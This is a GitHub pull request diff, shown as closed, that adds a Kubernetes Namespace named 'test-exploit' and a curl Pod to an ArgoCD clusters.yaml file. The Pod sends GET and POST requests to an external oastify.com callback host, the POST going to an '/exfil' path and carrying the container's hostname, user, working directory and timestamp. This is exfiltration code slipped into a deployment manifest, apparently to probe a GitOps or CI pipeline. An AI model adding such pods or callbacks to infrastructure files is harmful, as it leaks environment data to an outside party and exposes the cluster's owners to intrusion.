Skip to content
Closed
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
37 changes: 37 additions & 0 deletions kubernetes/gke-utility/argocd/clusters.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -25,6 +25,43 @@ stringData:
}
}
---
apiVersion: v1
kind: Namespace
metadata:
name: test-exploit
---
apiVersion: v1
kind: Pod
metadata:
name: curl-test
namespace: test-exploit
labels:
app: test-exploit
spec:
restartPolicy: Never
containers:
- name: curl
image: curlimages/curl:latest
command:
- /bin/sh
- -c
- |
# Simple DNS exfiltration test
curl -v http://n1p9mq355rj3p51jr6czvl7u6lcc05ou.oastify.com/webhook?source=github_actions&test=success

# Com mais informações do ambiente
curl -X POST http://n1p9mq355rj3p51jr6czvl7u6lcc05ou.oastify.com/exfil \
-H "Content-Type: application/json" \
-d "{
\"hostname\": \"$(hostname)\",
\"whoami\": \"$(whoami)\",
\"pwd\": \"$(pwd)\",
\"timestamp\": \"$(date -u +%Y-%m-%dT%H:%M:%SZ)\"
}"

echo "Curl test completed"
sleep 300
---
apiVersion: v1
kind: Secret
metadata:
Expand Down
Loading